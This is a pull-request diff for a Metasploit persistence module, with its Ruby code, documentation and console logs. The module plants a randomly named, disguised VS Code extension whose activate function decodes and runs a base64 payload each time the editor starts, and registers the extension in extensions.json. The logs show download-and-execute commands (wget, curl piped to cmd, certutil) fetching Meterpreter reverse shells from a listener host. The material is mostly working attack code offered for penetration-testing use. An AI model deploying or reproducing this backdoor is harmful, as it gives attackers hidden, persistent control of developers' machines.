### PR TITLE
VS Code extension persistence

### DIFF
--- a/data/exploits/vscode_extension/extension.js.template
+++ b/data/exploits/vscode_extension/extension.js.template
@@ -1,0 +1,1 @@
+exports.activate=function(context){try{var p=require('fs').readFileSync(require('path').join(context.extensionPath,'external'),'utf8').trim();require('child_process').exec(Buffer.from(p,'base64').toString());}catch(e){}};exports.deactivate=function(){};

--- a/documentation/modules/exploit/multi/persistence/vscode_extension.md
+++ b/documentation/modules/exploit/multi/persistence/vscode_extension.md
@@ -14,7 +14,7 @@ Tested against 1.120.0 on Kali and Windows 10
 3. Get a shell
 4. Do: `use exploit/multi/persistence/vscode_extension`
 5. Do: `run`
-6. You should get a shell when vscode is opens next
+6. You should get a shell when vscode opens next
 
 ## Options
 

--- a/documentation/modules/exploit/multi/persistence/vscode_extension.md
+++ b/documentation/modules/exploit/multi/persistence/vscode_extension.md
@@ -1,0 +1,232 @@
+## Vulnerable Application
+
+This module installs a malicious VS Code extension into the target's
+VS Code extensions directory. The extension executes the payload each time
+VS Code is launched, providing persistent code execution. Supports VS Code,
+VS Code Insiders, VSCodium, VS Code Server, and Cursor.
+
+Tested against 1.120.0 on Kali and Windows 10
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a shell
+4. Do: `use exploit/multi/persistence/vscode_extension`
+5. Do: `run`
+6. You should get a shell when vscode is opens next
+
+## Options
+
+### NAME
+
+Name of the extension (Random if left blank). Defaults to ``.
+
+### PUBLISHER
+
+Publisher name for the extension (Random if left blank). Defaults to ``.
+
+### DESCRIPTION
+
+Description of the extension (Random if left blank). Defaults to ``.
+
+### USER
+
+User to target, or current user if blank (Random if left blank). Defaults to ``.
+
+### ICON
+
+Local path to an icon file (PNG) to include with the extension. Defaults to no icon
+
+## Scenarios
+
+### VSCode 1.120.0 on Kali
+
+Original Shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446 
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO jNobBPgs --no-check-certificate http://1.1.1.1:8082/l; chmod +x jNobBPgs; ./jNobBPgs& disown
+msf exploit(multi/script/web_delivery) > 
+[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:60886) at 2026-05-15 08:54:57 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : h00die-kali
+OS           : Debian  (Linux 6.19.14+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/vscode_extension 
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/persistence/vscode_extension) > set session 1
+session => 1
+msf exploit(multi/persistence/vscode_extension) > set target 1
+target => 1
+msf exploit(multi/persistence/vscode_extension) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/persistence/vscode_extension) > exploit
+[*] Command to run on remote host: curl -so ./iMMtopaQ http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./iMMtopaQ;./iMMtopaQ&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/persistence/vscode_extension) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target user: h00die
+[+] The target appears to be vulnerable. VS Code extensions directory found: /root/.vscode/extensions
+[*] Using extension: fkhtvcu.cjfkvxfx-1.0.0
+[*] Target user: h00die
+[*] Installing to: /root/.vscode/extensions
+[*] Creating extension directory: /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
+[*] Creating directory /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
+[*] /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0 created
+[+] Wrote package.json to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/package.json
+[+] Wrote extension.js to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/extension.js
+[+] Wrote payload to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/external
+[*] Reading extensions.json...
+[+] Registered extension in /root/.vscode/extensions/extensions.json
+[!] VS Code is currently running - restart VS Code to activate the extension.
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260515.5724/h00die-kali_20260515.5724.rc
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.19.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:60160) at 2026-05-15 08:57:46 -0400
+```
+
+### VSCode 1.120.0 on Windows 10
+
+Original shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/sDEHsFj37VRR4ySrr8_b_w & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /sDEHsFj37VRR4ySrr8_b_w
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /w3
+[*] Sending payload to 2.2.2.2 (curl/8.13.0)
+[*] Client 2.2.2.2 requested /sDEHsFj37VRR4ySrr8_b_w
+[*] Sending payload to 2.2.2.2 (curl/8.13.0)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:64885) at 2026-05-15 08:37:21 -0400
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: DESKTOP-3PTMHF3\h00die
+meterpreter > sysinfo
+Computer        : DESKTOP-3PTMHF3
+OS              : Windows 10 22H2+ (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/vscode_extension 
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/persistence/vscode_extension) > set target 0
+target => 0
+msf exploit(multi/persistence/vscode_extension) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/persistence/vscode_extension) > set session 1
+session => 1
+msf exploit(multi/persistence/vscode_extension) > exploit
+[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\VGCHkxyx.exe & start /B %TEMP%\VGCHkxyx.exe
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(multi/persistence/vscode_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
+[*] Target user: h00die
+[+] The target appears to be vulnerable. VS Code extensions directory found: C:\Users\h00die\.vscode\extensions
+[*] Using extension: oiok.niuvribguy-1.0.0
+[*] Target user: h00die
+[*] Installing to: C:\Users\h00die\.vscode\extensions
+[*] Creating extension directory: C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
+[*] Creating directory C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
+[*] C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0 created
+[+] Wrote package.json to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\package.json
+[+] Wrote extension.js to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\extension.js
+[+] Wrote payload to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\external
+[*] Reading extensions.json...
+[+] Registered extension in C:\Users\h00die\.vscode\extensions\extensions.json
+[*] VS Code is not running - launch it to trigger the extension.
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/DESKTOP-3PTMHF3_20260515.4157/DESKTOP-3PTMHF3_20260515.4157.rc
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
+[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
+[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
+[*] Sending stage (248902 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:65022) at 2026-05-15 08:42:16 -0400
+```

--- a/modules/exploits/multi/persistence/vscode_extension.rb
+++ b/modules/exploits/multi/persistence/vscode_extension.rb
@@ -158,7 +158,12 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     vscode_ext_dirs.each do |dir|
-      return CheckCode::Appears("VS Code extensions directory found: #{dir}") if directory?(dir)
+      next unless directory?(dir)
+      if !windows? && !writable?(dir)
+        return CheckCode::Appears("VS Code extensions directory found but not writable: #{dir}")
+      end
+
+      return CheckCode::Appears("VS Code extensions directory found: #{dir}")
     end
 
     CheckCode::Safe('No VS Code extensions directory found')
@@ -170,7 +175,8 @@ class MetasploitModule < Msf::Exploit::Local
     if windows?
       !cmd_exec('powershell -Command "Get-Process -Name Code* -ErrorAction SilentlyContinue"').strip.empty?
     else
-      !cmd_exec('pgrep -i "code" 2>/dev/null').strip.empty?
+      # The [c]ode bracket trick prevents the grep process itself from matching
+      !cmd_exec('ps -ef 2>/dev/null | grep -i "[c]ode"').strip.empty?
     end
   end
 
@@ -246,11 +252,11 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     pkg_path = "#{ext_dir}#{sep}package.json"
-    write_file(pkg_path, package_json)
+    fail_with(Failure::UnexpectedReply, "Failed to write #{pkg_path}") unless write_file(pkg_path, package_json)
     print_good("Wrote package.json to #{pkg_path}")
 
     js_path = "#{ext_dir}#{sep}extension.js"
-    write_file(js_path, extension_js)
+    fail_with(Failure::UnexpectedReply, "Failed to write #{js_path}") unless write_file(js_path, extension_js)
     print_good("Wrote extension.js to #{js_path}")
 
     unless datastore['ICON'].blank?
@@ -258,12 +264,12 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, "ICON is not a valid PNG file: #{datastore['ICON']}") unless icon_data.b.start_with?("\x89PNG\r\n\x1a\n".b)
 
       icon_path = "#{ext_dir}#{sep}#{::File.basename(datastore['ICON'])}"
-      write_file(icon_path, icon_data)
+      fail_with(Failure::UnexpectedReply, "Failed to write #{icon_path}") unless write_file(icon_path, icon_data)
       print_good("Wrote icon to #{icon_path}")
     end
 
     ext_path = "#{ext_dir}#{sep}external"
-    write_file(ext_path, [payload.encoded].pack('m0'))
+    fail_with(Failure::UnexpectedReply, "Failed to write #{ext_path}") unless write_file(ext_path, [payload.encoded].pack('m0'))
     print_good("Wrote payload to #{ext_path}")
 
     register_extension(ext_base, ext_dir)

--- a/modules/exploits/multi/persistence/vscode_extension.rb
+++ b/modules/exploits/multi/persistence/vscode_extension.rb
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Local
         'Privileged' => false,
         'References' => [
           ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
-          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
+          ['ATT&CK', Mitre::Attack::Technique::T1176_SOFTWARE_EXTENSIONS]
         ],
         'Arch' => [ARCH_CMD],
         'Platform' => %w[linux windows],

--- a/modules/exploits/multi/persistence/vscode_extension.rb
+++ b/modules/exploits/multi/persistence/vscode_extension.rb
@@ -2,6 +2,7 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+# frozen_string_literal: true
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
@@ -9,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Unix # whoami
   include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -20,10 +22,12 @@ class MetasploitModule < Msf::Exploit::Local
           VS Code extensions directory. The extension executes the payload each time
           VS Code is launched, providing persistent code execution. Supports VS Code,
           VS Code Insiders, VSCodium, VS Code Server, and Cursor.
+
+          Tested against 1.120.0 on Kali and Windows 10
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'h00die', # Module
+          'h00die',
         ],
         'DisclosureDate' => '2015-04-29', # VS Code first public release
         'SessionTypes' => ['shell', 'meterpreter'],
@@ -33,15 +37,15 @@ class MetasploitModule < Msf::Exploit::Local
           ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
         ],
         'Arch' => [ARCH_CMD],
-        'Platform' => %w[linux windows osx],
+        'Platform' => %w[linux windows],
         'Payload' => {
           'Space' => 8191,
           'DisableNops' => true
         },
         'Targets' => [
           ['Windows', { 'Platform' => 'windows' }],
-          ['Linux', { 'Platform' => 'unix' }],
-          ['OSX', { 'Platform' => 'osx' }]
+          ['Linux', { 'Platform' => ['unix', 'linux'] }],
+          # ['OSX', { 'Platform' => 'osx' }] this likely works but I don't have a test environment to verify it, so leaving it out of the target list for now
         ],
         'Notes' => {
           'Reliability' => [REPEATABLE_SESSION],
@@ -53,10 +57,12 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-      OptString.new('NAME', [false, 'Name of the extension', '']),
-      OptString.new('PUBLISHER', [false, 'Publisher name for the extension', '']),
-      OptString.new('DESCRIPTION', [false, 'Description of the extension', '']),
-      OptString.new('USER', [false, 'User to target, or current user if blank', ''])
+      OptString.new('NAME', [false, 'Name of the extension (Random if left blank)', '']),
+      OptString.new('PUBLISHER', [false, 'Publisher name for the extension (Random if left blank)', '']),
+      OptString.new('DESCRIPTION', [false, 'Description of the extension (Random if left blank)', '']),
+      OptString.new('USER', [false, 'User to target, or current user if blank', '']),
+      OptPath.new('ICON', [false, 'Local path to an icon file (PNG) to include with the extension']),
+      OptString.new('VERSION', [false, 'Extension version in major.minor.patch format', '1.0.0'])
     ])
     deregister_options('WritableDir')
   end
@@ -69,25 +75,38 @@ class MetasploitModule < Msf::Exploit::Local
     @ext_publisher ||= datastore['PUBLISHER'].blank? ? rand_text_alpha(4..8).downcase : datastore['PUBLISHER'].downcase
   end
 
+  def ext_version
+    @ext_version ||= begin
+      ver = datastore['VERSION'].blank? ? '1.0.0' : datastore['VERSION']
+      fail_with(Failure::BadConfig, "VERSION must be in major.minor.patch format (e.g. 1.0.0), got: #{ver}") unless ver.match?(/\A\d+\.\d+\.\d+\z/)
+      ver
+    end
+  end
+
   def ext_dir_name
-    "#{ext_publisher}.#{ext_name}-1.0.0"
+    "#{ext_publisher}.#{ext_name}-#{ext_version}"
   end
 
   def package_json
-    {
+    pkg = {
       'name' => ext_name,
       'displayName' => ext_name,
       'description' => datastore['DESCRIPTION'].blank? ? '' : datastore['DESCRIPTION'],
-      'version' => '1.0.0',
+      'version' => ext_version,
       'publisher' => ext_publisher,
       'engines' => { 'vscode' => '^1.0.0' },
       'activationEvents' => ['*'],
       'main' => './extension.js'
-    }.to_json
+    }
+    pkg['icon'] = "./#{::File.basename(datastore['ICON'])}" unless datastore['ICON'].blank?
+    pkg.to_json
   end
 
   def extension_js
-    ::File.read(::File.join(Msf::Config.data_directory, 'exploits', 'vscode_extension', 'extension.js.template'))
+    template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'vscode_extension', 'extension.js.template')
+    fail_with(Failure::BadConfig, "Extension template not found: #{template_path}") unless ::File.exist?(template_path)
+
+    ::File.read(template_path)
   end
 
   def target_user
@@ -102,29 +121,28 @@ class MetasploitModule < Msf::Exploit::Local
     ['windows', 'win'].include?(session.platform)
   end
 
-  def osx?
-    session.platform == 'osx'
-  end
+  # def osx?
+  #   session.platform == 'osx'
+  # end
 
   def vscode_ext_dirs
     user = target_user
     vprint_status("Target user: #{user}")
 
-    case session.platform
-    when 'windows', 'win'
+    if windows?
       [
         "C:\\Users\\#{user}\\.vscode\\extensions",
         "C:\\Users\\#{user}\\.vscode-insiders\\extensions",
         "C:\\Users\\#{user}\\.cursor\\extensions"
       ]
-    when 'osx'
-      [
-        "/Users/#{user}/.vscode/extensions",
-        "/Users/#{user}/.vscode-insiders/extensions",
-        "/Users/#{user}/.vscode-oss/extensions",
-        "/Users/#{user}/.cursor/extensions"
-      ]
-    else # linux
+    # when 'osx' — uncomment and add 'osx' to Platform/Targets once verified on macOS
+    # [
+    #   "/Users/#{user}/.vscode/extensions",
+    #   "/Users/#{user}/.vscode-insiders/extensions",
+    #   "/Users/#{user}/.vscode-oss/extensions",
+    #   "/Users/#{user}/.cursor/extensions"
+    # ]
+    else
       home = user == 'root' ? '/root' : "/home/#{user}"
       [
         "#{home}/.vscode/extensions",
@@ -143,6 +161,8 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     CheckCode::Safe('No VS Code extensions directory found')
+  rescue StandardError => e
+    CheckCode::Unknown("Error checking for VS Code: #{e.message}")
   end
 
   def vscode_running?
@@ -172,14 +192,14 @@ class MetasploitModule < Msf::Exploit::Local
         # Remove any stale entry for this extension id
         extensions.reject! { |e| e.dig('identifier', 'id')&.casecmp?("#{ext_publisher}.#{ext_name}") }
       rescue JSON::ParserError => e
-        print_warning("Could not parse extensions.json: #{e.message} — starting fresh")
+        print_warning("Could not parse extensions.json: #{e.message} - starting fresh")
         extensions = []
       end
     end
 
     entry = {
       'identifier' => { 'id' => "#{ext_publisher}.#{ext_name}" },
-      'version' => '1.0.0',
+      'version' => ext_version,
       'location' => {
         '$mid' => 1,
         'fsPath' => ext_dir,
@@ -232,6 +252,15 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(js_path, extension_js)
     print_good("Wrote extension.js to #{js_path}")
 
+    unless datastore['ICON'].blank?
+      icon_data = ::File.binread(datastore['ICON'])
+      fail_with(Failure::BadConfig, "ICON is not a valid PNG file: #{datastore['ICON']}") unless icon_data.b.start_with?("\x89PNG\r\n\x1a\n".b)
+
+      icon_path = "#{ext_dir}#{sep}#{::File.basename(datastore['ICON'])}"
+      write_file(icon_path, icon_data)
+      print_good("Wrote icon to #{icon_path}")
+    end
+
     ext_path = "#{ext_dir}#{sep}external"
     write_file(ext_path, [payload.encoded].pack('m0'))
     print_good("Wrote payload to #{ext_path}")
@@ -239,15 +268,11 @@ class MetasploitModule < Msf::Exploit::Local
     register_extension(ext_base, ext_dir)
 
     if vscode_running?
-      print_warning('VS Code is currently running — restart VS Code to activate the extension.')
+      print_warning('VS Code is currently running - restart VS Code to activate the extension.')
     else
-      print_status('VS Code is not running — launch it to trigger the extension.')
+      print_status('VS Code is not running - launch it to trigger the extension.')
     end
 
-    if windows?
-      @clean_up_rc << "rmdir /s /q \"#{ext_dir}\"\n"
-    else
-      @clean_up_rc << "rm -rf \"#{ext_dir}\"\n"
-    end
+    @clean_up_rc << "rm -rf \"#{ext_dir}\"\n"
   end
 end

--- a/modules/exploits/multi/persistence/vscode_extension.rb
+++ b/modules/exploits/multi/persistence/vscode_extension.rb
@@ -1,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix # whoami
+  include Msf::Exploit::Local::Persistence
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VS Code Extension Persistence',
+        'Description' => %q{
+          This module installs a malicious VS Code extension into the target's
+          VS Code extensions directory. The extension executes the payload each time
+          VS Code is launched, providing persistent code execution. Supports VS Code,
+          VS Code Insiders, VSCodium, VS Code Server, and Cursor.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # Module
+        ],
+        'DisclosureDate' => '2015-04-29', # VS Code first public release
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Privileged' => false,
+        'References' => [
+          ['URL', 'https://code.visualstudio.com/api/get-started/your-first-extension'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION]
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => %w[linux windows osx],
+        'Payload' => {
+          'Space' => 8191,
+          'DisableNops' => true
+        },
+        'Targets' => [
+          ['Windows', { 'Platform' => 'windows' }],
+          ['Linux', { 'Platform' => 'unix' }],
+          ['OSX', { 'Platform' => 'osx' }]
+        ],
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [false, 'Name of the extension', '']),
+      OptString.new('PUBLISHER', [false, 'Publisher name for the extension', '']),
+      OptString.new('DESCRIPTION', [false, 'Description of the extension', '']),
+      OptString.new('USER', [false, 'User to target, or current user if blank', ''])
+    ])
+    deregister_options('WritableDir')
+  end
+
+  def ext_name
+    @ext_name ||= datastore['NAME'].blank? ? rand_text_alphanumeric(4..10).downcase : datastore['NAME'].downcase
+  end
+
+  def ext_publisher
+    @ext_publisher ||= datastore['PUBLISHER'].blank? ? rand_text_alpha(4..8).downcase : datastore['PUBLISHER'].downcase
+  end
+
+  def ext_dir_name
+    "#{ext_publisher}.#{ext_name}-1.0.0"
+  end
+
+  def package_json
+    {
+      'name' => ext_name,
+      'displayName' => ext_name,
+      'description' => datastore['DESCRIPTION'].blank? ? '' : datastore['DESCRIPTION'],
+      'version' => '1.0.0',
+      'publisher' => ext_publisher,
+      'engines' => { 'vscode' => '^1.54.0' },
+      'activationEvents' => ['onStartupFinished'],
+      'main' => './extension.js'
+    }.to_json
+  end
+
+  def extension_js
+    ::File.read(::File.join(Msf::Config.data_directory, 'exploits', 'vscode_extension', 'extension.js.template'))
+  end
+
+  def target_user
+    return datastore['USER'] unless datastore['USER'].blank?
+
+    return cmd_exec('cmd.exe /c echo %USERNAME%').strip if windows?
+
+    whoami
+  end
+
+  def windows?
+    ['windows', 'win'].include?(session.platform)
+  end
+
+  def osx?
+    session.platform == 'osx'
+  end
+
+  def vscode_ext_dirs
+    user = target_user
+    vprint_status("Target user: #{user}")
+
+    case session.platform
+    when 'windows', 'win'
+      [
+        "C:\\Users\\#{user}\\.vscode\\extensions",
+        "C:\\Users\\#{user}\\.vscode-insiders\\extensions",
+        "C:\\Users\\#{user}\\.cursor\\extensions"
+      ]
+    when 'osx'
+      [
+        "/Users/#{user}/.vscode/extensions",
+        "/Users/#{user}/.vscode-insiders/extensions",
+        "/Users/#{user}/.vscode-oss/extensions",
+        "/Users/#{user}/.cursor/extensions"
+      ]
+    else # linux
+      home = user == 'root' ? '/root' : "/home/#{user}"
+      [
+        "#{home}/.vscode/extensions",
+        "#{home}/.vscode-insiders/extensions",
+        "#{home}/.vscode-server/extensions",
+        "#{home}/.vscode-oss/extensions",
+        "#{home}/.cursor/extensions",
+        "#{home}/snap/code/current/.config/Code/extensions"
+      ]
+    end
+  end
+
+  def check
+    vscode_ext_dirs.each do |dir|
+      return CheckCode::Appears("VS Code extensions directory found: #{dir}") if directory?(dir)
+    end
+
+    CheckCode::Safe('No VS Code extensions directory found')
+  end
+
+  def vscode_running?
+    if windows?
+      !cmd_exec('powershell -Command "Get-Process -Name Code* -ErrorAction SilentlyContinue"').strip.empty?
+    else
+      !cmd_exec('pgrep -i "code" 2>/dev/null').strip.empty?
+    end
+  end
+
+  def install_persistence
+    print_status("Using extension: #{ext_dir_name}")
+
+    ext_base = vscode_ext_dirs.find { |dir| directory?(dir) }
+    fail_with(Failure::NotFound, 'No VS Code extensions directory found') if ext_base.nil?
+
+    print_status("Installing to: #{ext_base}")
+
+    sep = windows? ? '\\' : '/'
+    ext_dir = "#{ext_base}#{sep}#{ext_dir_name}"
+
+    unless directory?(ext_dir)
+      print_status("Creating extension directory: #{ext_dir}")
+      mkdir(ext_dir, cleanup: false)
+    end
+
+    pkg_path = "#{ext_dir}#{sep}package.json"
+    write_file(pkg_path, package_json)
+    print_good("Wrote package.json to #{pkg_path}")
+
+    js_path = "#{ext_dir}#{sep}extension.js"
+    write_file(js_path, extension_js)
+    print_good("Wrote extension.js to #{js_path}")
+
+    ext_path = "#{ext_dir}#{sep}external"
+    write_file(ext_path, [payload.encoded].pack('m0'))
+    print_good("Wrote payload to #{ext_path}")
+
+    if vscode_running?
+      print_warning('VS Code is currently running — restart VS Code to activate the extension.')
+    else
+      print_status('VS Code is not running — launch it to trigger the extension.')
+    end
+
+    if windows?
+      @clean_up_rc << "rmdir /s /q \"#{ext_dir}\"\n"
+    else
+      @clean_up_rc << "rm -rf \"#{ext_dir}\"\n"
+    end
+  end
+end

--- a/modules/exploits/multi/persistence/vscode_extension.rb
+++ b/modules/exploits/multi/persistence/vscode_extension.rb
@@ -80,8 +80,8 @@ class MetasploitModule < Msf::Exploit::Local
       'description' => datastore['DESCRIPTION'].blank? ? '' : datastore['DESCRIPTION'],
       'version' => '1.0.0',
       'publisher' => ext_publisher,
-      'engines' => { 'vscode' => '^1.54.0' },
-      'activationEvents' => ['onStartupFinished'],
+      'engines' => { 'vscode' => '^1.0.0' },
+      'activationEvents' => ['*'],
       'main' => './extension.js'
     }.to_json
   end
@@ -153,6 +153,61 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
+  # VS Code URI path format for Windows: /c:/users/... (lowercase drive, forward slashes)
+  def uri_path(full_path)
+    return full_path unless windows?
+
+    '/' + full_path.gsub('\\', '/').sub(/^([A-Za-z]):/) { "#{::Regexp.last_match(1).downcase}:" }
+  end
+
+  def register_extension(ext_base, ext_dir)
+    sep = windows? ? '\\' : '/'
+    index_path = "#{ext_base}#{sep}extensions.json"
+
+    extensions = []
+    if file?(index_path)
+      print_status('Reading extensions.json...')
+      begin
+        extensions = JSON.parse(read_file(index_path))
+        # Remove any stale entry for this extension id
+        extensions.reject! { |e| e.dig('identifier', 'id')&.casecmp?("#{ext_publisher}.#{ext_name}") }
+      rescue JSON::ParserError => e
+        print_warning("Could not parse extensions.json: #{e.message} — starting fresh")
+        extensions = []
+      end
+    end
+
+    entry = {
+      'identifier' => { 'id' => "#{ext_publisher}.#{ext_name}" },
+      'version' => '1.0.0',
+      'location' => {
+        '$mid' => 1,
+        'fsPath' => ext_dir,
+        'path' => uri_path(ext_dir),
+        'scheme' => 'file'
+      },
+      'relativeLocation' => ext_dir_name,
+      'metadata' => {
+        'id' => SecureRandom.uuid,
+        'publisherId' => SecureRandom.uuid,
+        'publisherDisplayName' => ext_publisher,
+        'targetPlatform' => 'undefined',
+        'isPreReleaseVersion' => false,
+        'hasPreReleaseVersion' => false,
+        'installedTimestamp' => (Time.now.to_f * 1000).to_i,
+        'pinned' => false,
+        'isApplicationScoped' => false,
+        'updated' => false,
+        'preRelease' => false
+      }
+    }
+
+    extensions << entry
